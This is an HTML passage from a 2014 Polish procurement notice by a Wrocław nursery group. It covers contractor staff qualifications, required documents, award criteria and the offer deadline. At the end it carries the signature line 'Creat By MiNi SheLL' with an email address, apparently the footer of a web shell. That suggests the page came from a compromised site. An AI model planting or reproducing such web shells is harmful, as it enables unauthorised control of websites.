10) aparatura kontrolno-pomiarowa i urządzenia automatycznej regulacji do urządzeń i instalacji w zakresie jak wyżej zgodnie z Rozporządzeniem ministra gospodarki, pracy i polityki społecznej z dnia 28.03.2003 r. w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci (Dz. U. z 2003 r. Nr 89, poz. 828)
a)wskaże podstawę do dysponowania tymi osobami,

b)oświadczy, że wykazana  osoba, która  będzie uczestniczyć w wykonywaniu zamówienia, posiada wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.

c)Sprawdzenie w/w warunku udziału w postępowaniu odbywać się będzie na podstawie wykazu osób i przedłożonych przez Wykonawcę informacji o podstawie do dysponowania tymi zasobami i oświadczenia . 
 Ocena spełnienia tego warunku zostanie dokonana wg formuły: spełnia - nie spełnia. 

7)	1 osobą posiadającą Certyfikat  kat II  zgodnie z Rozporządzeniem Komisji (WE) NR  303/2008 z dnia  2 kwietnia 2008r. ustanawiające, na mocy rozporządzenia (WE) nr 84/2006 Parlamentu Europejskiego i Rady, minimalne wymagania i warunki dotyczące wzajemnego uznania certyfikacji przedsiębiorstw i personelu w odniesieniu do stacjonarnych urządzeń chłodniczych, klimatyzacyjnych i pomp ciepła zawierających fluorowe gazy cieplarniane 
a)wskaże podstawę do dysponowania tą osobą; 
b)oświadczy, że wykazana  osoba, która  będzie uczestniczyć w wykonywaniu zamówienia, posiada wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
c)Sprawdzenie w/w warunku udziału w postępowaniu odbywać się będzie na podstawie wykazu osób i przedłożonych przez Wykonawcę informacji o podstawie do dysponowania tymi zasobami i oświadczenia . 
 Ocena spełnienia tego warunku zostanie dokonana wg formuły: spełnia - nie spełnia. 
Zamawiający dopuszcza możliwość łączenia dla 1 osoby stanowiska eksploatacji ze stanowiskiem dozoru  łącznie z certyfikatem pod warunkiem zachowania obowiązujących przepisów technicznych, BHP.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek udziału w postępowaniu został spełniony na podstawie złożonego oświadczenia z art. 22 ust. 1 ustawy Pzp (załącznik nr 3 do SIWZ).
 Ocena spełnienia tego warunku zostanie dokonana wg formuły: spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">a)	wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami (załącznik nr 6 do SIWZ).

b)	oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają 
wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień (załącznik nr 6 do SIWZ).</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a) Wypełniony i podpisany formularz oferty - Załącznik Nr 1 do SIWZ.
b) Wypełnione i podpisane Zestawienie kosztów zadania  - Załącznik Nr 2 do SIWZ
c) Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentu, o którym mowa w punkcie dotyczącym dokumentów podmiotów zagranicznych, zastępuje się go dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji Wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, 
w którym Wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem -wystawionym nie wcześniej niż 6 miesięcy przed upływem terminu składania  ofert. 
d) W przypadku wątpliwości co do treści dokumentu złożonego przez Wykonawcę mającego siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, Zamawiający może zwrócić się do właściwych organów odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, z wnioskiem o udzielenie niezbędnych informacji dotyczących przedłożonego dokumentu.
e) W przypadku podmiotów wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku innych podmiotów, na zasobach których Wykonawca polega na zasadach określonych w art. 26 ust. 2b ustawy PZP, kopie dokumentów dotyczących odpowiednio Wykonawcy lub tych podmiotów są poświadczane za zgodność z oryginałem odpowiednio przez Wykonawcę lub te podmioty.
f) Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych 
do wykonania zamówienia lub zdolnościach finansowych (jeśli dotyczy) innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. W takiej sytuacji Wykonawca zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów (oryginał) do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
g) Dokument, z którego wynika upoważnienie osoby/osób do podpisania oferty w imieniu Wykonawcy   lub pełnomocnictwo do reprezentowania Wykonawcy składa się w formie oryginału lub kopii poświadczonej   przez notariusza, o ile nie wynika ono z innych dokumentów załączonych do oferty przez Wykonawcę. 
h) W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia w myśl art. 23 ustawy PZP:
h.1) należy dostarczyć pełnomocnictwo do reprezentowania wszystkich Wykonawców. Pełnomocnik może być ustanowiony do reprezentowania Wykonawców w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia. Zamawiający dopuszcza złożenie przedmiotowego dokumentu w formie oryginału lub kopii poświadczonej przez notariusza,
h.2) dokumenty składane w zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, dotyczące Wykonawców wspólnie ubiegających się o udzielenie zamówienia winien złożyć każdy z Wykonawców wspólnie ubiegających się o zamówienie.
h.3) informację o przynależności do tej samej do grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5 ustawy PZP składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Wszelkie zmiany i uzupełnienia umowy wymagają zachowania formy pisemnej w postaci aneksu do niniejszej umowy podpisanego przez obie Strony, pod rygorem nieważności. 
2.Zamawiający przewiduje możliwość zmiany umowy zgodnie z ustawą Pzp w następujących przypadkach:
1)	zmiany przeznaczenia obiektu, 
2)	gdy ze względów organizacyjnych nastąpi przekazanie w trakcie trwania umowy obiektu do zarządzania innemu podmiotowi gminnemu, 
3)	działania siły wyższej i osób trzecich.
4)	zaistnienia okoliczności, które nie mogły być przewidziane w czasie postępowania tj. zmian ogólnie obowiązujących przepisów, przepisów  prawa miejscowego oraz wymogów dotyczących Zamawiającego bezpośrednio odnoszących się do praw i obowiązków stron umowy; 
5)	gdy w trakcie trwania umowy zmianie ulegać będzie zasób obiektów Zamawiającego, zatem zmiana ta może dotyczyć wskazania innych adresów  w miejsce wskazanych przy zawarciu umowy ( zmiana lokalizacji nie powoduje dodatkowego wynagrodzenia).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.wzz.wroc.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wrocławski Zespół Żłobków
ul. Fabryczna 15, 53-609 Wrocław.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.03.2014 godzina 10:00, miejsce: Wrocławski Zespół Żłobków
ul. Fabryczna 15, 53-609 Wrocław
Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com